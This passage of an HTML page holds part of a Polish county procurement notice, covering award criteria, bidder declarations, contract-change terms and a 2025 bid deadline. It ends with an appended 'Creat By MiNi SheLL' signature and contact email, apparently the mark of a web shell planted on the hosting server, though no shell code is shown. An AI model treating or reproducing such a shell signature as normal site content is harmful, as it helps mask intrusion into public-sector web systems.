class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenie (o którym mowa w art. 125 ust. 1 ustawy Pzp) stanowiące wstępne potwierdzenie, że Wykonawca na dzień składania ofert nie podlega wykluczeniu z postępowania - Załącznik nr 3 do SWZ. <br/>2. Oświadczenie, o którym mowa w pkt. 1, stanowi dowód potwierdzający brak podstaw wykluczenia na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe. <br/>3. W przypadku, wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w pkt 1 składa każdy z Wykonawców. Oświadczenie to potwierdza brak podstaw wykluczenia. <br/><br/>Składane na wezwanie Zamawiającego:<br/>1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następującego podmiotowego środka dowodowego, w celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu (aktualnego na dzień złożenia) - Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w Rozdziale VIII SWZ, o których mowa w art. 108 ust. 1 ustawy Pzp – Załącznik nr 4 do SWZ. <br/>2. Wykonawca składa podmiotowe środki dowodowe określone w pkt. 4 na wezwanie Zamawiającego. Dokumenty te powinny być aktualne na dzień ich złożenia. <br/>3. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta musi zawierać następujące oświadczenia i dokumenty: <br/>1) Formularz ofertowy, stanowiący Załącznik nr 2 do SWZ (przy czym Wykonawca może sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować dane wymagane dla oferty w SWZ i załącznikach). <br/>2) Oświadczenie, o którym mowa w pkt. 1 Rozdział IX SWZ – załącznik nr 3 do SWZ;<br/>3) Potwierdzenie umocowania do działania w imieniu Wykonawcy: <br/>a) Zamawiający w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru; <br/>b) Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a), jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. <br/>c) jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit a), Zamawiający żąda od Wykonawcy złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy. <br/>4) Pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>a) oświadczenie o których mowa w pkt. 1 Rozdział IX SWZ składa z ofertą każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia. <br/>b) zobowiązani są na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 4 Rozdział IX SWZ. Podmiotowe środki dowodowe, o których mowa w pkt. 4 Rozdział IX SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Umowa w sprawie zamówienia publicznego wymaga, pod rygorem nieważności, zachowania formy pisemnej. <br/>2. Zamawiający dopuszcza - jeżeli uzna to za uzasadnione - możliwość zmiany ustaleń zawartej Umowy w stosunku do treści oferty Wykonawcy, w przypadkach, o których mowa w art. 455 ustawy z dnia 11 września 2019r. Prawo Zamówień Publicznych, a w szczególności: <br/>1) zmiany terminu realizacji Przedmiotu Umowy, w przypadku zaistnienia jednej z następujących okoliczności: <br/>a) zmiany będącej następstwem okoliczności leżących po stronie Zamawiającego, które spowodowały niezawinioną i niemożliwą do uniknięcia przez Wykonawcę zwłokę, <br/>w szczególności: <br/>- wstrzymania dostawy przez Zamawiającego; <br/>- wystąpienia zdarzeń wymuszających przerwę w realizacji Przedmiotu Umowy niezależnych <br/>od Wykonawcy; <br/>3) pozostałe zmiany spowodowane następującymi okolicznościami: <br/>a) przekształcenie którejkolwiek ze stron Umowy bądź zmiana adresu, <br/>b) zmiany warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna i niezbędna <br/>dla Zamawiającego; <br/>c) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ <br/>na realizację Przedmiotu Umowy lub świadczenia stron Umowy; <br/>d) innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego. <br/>3. Szczegółowe postanowienia Umowy zawarte zostały w Projekcie Umowy Załącznik nr 1 <br/>do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://powiat-radomski.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-13 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 310 ustawy Pzp, Zamawiający przewiduje możliwość unieważnienia przedmiotowego postępowania, jeżeli środki publiczne, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane, lub cena najkorzystniejszej/ych oferty lub ofert z najniższą ceną przewyższa kwotę, którą zamawiający zamierza przeznaczyć na sfinansowanie zamówienia.<br/><br/>Zamawiający ubiega się o dofinansowanie w ramach Programu Ochrony Ludności i Obrony Cywilnej na lata 2025-2026. W przypadku nieotrzymania dofinansowania Zamawiający unieważni postępowanie.

Creat By MiNi SheLL
Email: jattceo@gmail.com